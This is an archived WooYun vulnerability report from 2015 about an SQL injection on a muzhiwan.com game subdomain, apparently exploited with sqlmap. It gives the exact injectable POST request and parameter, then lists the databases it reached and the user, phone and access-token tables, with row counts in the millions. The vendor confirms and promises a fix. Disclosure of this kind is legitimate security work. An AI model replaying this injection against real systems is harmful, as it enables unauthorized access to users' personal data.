当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0134678

漏洞标题:拇指玩某站SQL注入涉及千万用户数据

相关厂商:muzhiwan.com

漏洞作者: 孤风

提交时间:2015-08-17 12:11

修复时间:2015-10-05 15:12

公开时间:2015-10-05 15:12

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-08-17: 细节已通知厂商并且等待厂商处理中
2015-08-21: 厂商已经确认,细节仅向厂商公开
2015-08-31: 细节向核心白帽子及相关领域专家公开
2015-09-10: 细节向普通白帽子公开
2015-09-20: 细节向实习白帽子公开
2015-10-05: 细节向公众公开

简要描述:

全站数据库,千万用户

详细说明:

注入点:

POST /index.php?action=detail&opt=getAjaxComment HTTP/1.1
Content-Length: 59
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: http://gsv.muzhiwan.com/
Host: gsv.muzhiwan.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*
num=1&sid=-1*


数据库:

available databases [25]:
[*] `googleinstall\x05`
[*] anquanxia
[*] applanet_user
[*] bug
[*] googlemarket
[*] googlemarketgame
[*] information_schema
[*] muzhiwan
[*] muzhiwan130409
[*] muzhiwan130417
[*] muzhiwanbbs
[*] muzhiwanbbstest
[*] muzhiwantest
[*] mysql
[*] mzw
[*] mzw_new_gz
[*] mzw_oa
[*] mzwtest
[*] redmine
[*] sdk
[*] stat
[*] stat_sdk
[*] test
[*] testlink
[*] wikidatabase


这个140W

Database: muzhiwan
+-----------------------------+---------+
| Table                       | Entries |
+-----------------------------+---------+
| mzw_staticgameinfo          | 31912349 |
| mzw_usertag_tab             | 2099307 |
| mzw_userinfo_tab            | 1406807 |
| mzw_comment_tab             | 300143  |
| mzw_baidubind_tab           | 89415   |
| mzw_sf_categorydetail_tab   | 47967   |
| mzw_commentreview_tab       | 24978   |
| mzw_user_cloudpush_tab      | 20680   |
| mzw_sf_pan_tab              | 15718   |
| mzw_mobileindex             | 15368   |
| mzw_appscoreinfo_tab        | 9647    |
| mzw_user_behaviour          | 7741    |
| mzw_sf_get_tab              | 3347    |
| mzw_user_subjectbind_tab    | 3229    |
| mzw_sf_scoreinfo_tab        | 3215    |
| mzw_wendatopic_tab          | 3025    |
| mzw_ad_item                 | 2795    |
| mzw_topicdetail_tab         | 2286    |
| baidutest                   | 2127    |
| mzw_sf_comment_tab          | 1832    |
| mzw_user_subjecttag_tab     | 582     |
| mzw_packutils_data          | 231     |
| mzw_user_subjectcomment_tab | 223     |
| mzw_corp_score_tab          | 214     |
| mzw_topiccomment_tab        | 192     |
| mzw_sf_getcomment_tab       | 189     |
| mzw_user_subjectinfo_tab    | 183     |
| mzw_sf_commentreview_tab    | 126     |
| mzw_topicinfo_tab           | 71      |
| mzw_user_subjectreview_tab  | 60      |
| mzw_topicreview_tab         | 49      |
| mzw_ad_agency               | 44      |
| mzw_ad_rules                | 32      |
| mzw_sf_user_recommend_tab   | 28      |
| mzw_packutils_users         | 23      |
| mzw_sf_categoryinfo_tab     | 19      |
| mzw_sf_to_tab               | 12      |
| mzw_sf_upload_tab           | 10      |
| mzw_packutils_error         | 9       |
| mzw_filterword_tab          | 1       |
+-----------------------------+---------+


这个900W

Database: mzw
+--------------------------------+---------+
| Table                          | Entries |
+--------------------------------+---------+
| mzw_users                      | 9253514 |
| mzw_game_net_giftbind          | 8458252 |
| mzw_log_goodgame_0             | 4105277 |
| mzw_user_reg                   | 3969609 |
| mzw_cp_game_gift_code          | 2800896 |
| mzw_users_phone                | 2360835 |
| mzw_phone_msg_log              | 2122518 |
| static_sdk_compatibility       | 1961833 |
| mzw_users_accesstoken          | 1770728 |
| mzw_favorite                   | 1490185 |
| mzw_users_origin               | 1461478 |
| mzw_users_profile              | 1427138 |
| mzw_save_game                  | 1107826 |
| mzw_sdk_pay_orders             | 987482  |
| mzw_game_v_comment_reply       | 972970  |
| mzw_feeds                      | 711900  |
| mzw_users_resetpwd             | 700378  |
| market_model_info              | 480322  |
| mzw_game_img_webp              | 420649  |
| mzw_game_article_detail        | 354736  |
| mzw_game_article               | 306657  |
| mzw_game_v_img                 | 210489  |
| mzw_userdevice_bind            | 205681  |
| mzw_admin_editlog              | 198266  |
| mzw_models                     | 168708  |
| mzw_admin_gameeditlog          | 125817  |
| mzw_game_v_img_copy            | 108105  |
| mzw_save_game_comment          | 103315  |
| mzw_game_search_tags_bind      | 90972   |
| mzw_game_v_downlist            | 56239   |
| mzw_users_sign                 | 52636   |
| pre_ucenter_members_cpfrom502  | 51740   |
| mzw_feedback                   | 50331   |
| lanxun_url                     | 44606   |
| mzw_game_v                     | 44327   |
| mzw_game_tags_bind             | 39455   |
| mzw_game_v_img_temp            | 38457   |
| mzw_game_google                | 37985   |
| mzw_game_album_contents        | 34291   |
| mwz_sdk_user_reg_log           | 29745   |
| mzw_game_vote                  | 26823   |
| mzw_game_v_downlist_copy       | 26458   |
| mzw_game_unzip_diff            | 26398   |
| mzw_report_tab                 | 23040   |
| mzw_crack_wishing              | 22739   |
| mzw_censorword                 | 21145   |
| `group`                        | 18420   |

漏洞证明:

见上

修复方案:

2333

版权声明:转载请注明来源 孤风@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:20

确认时间:2015-08-21 15:11

厂商回复:

您好,我们会尽快修复

最新状态:

暂无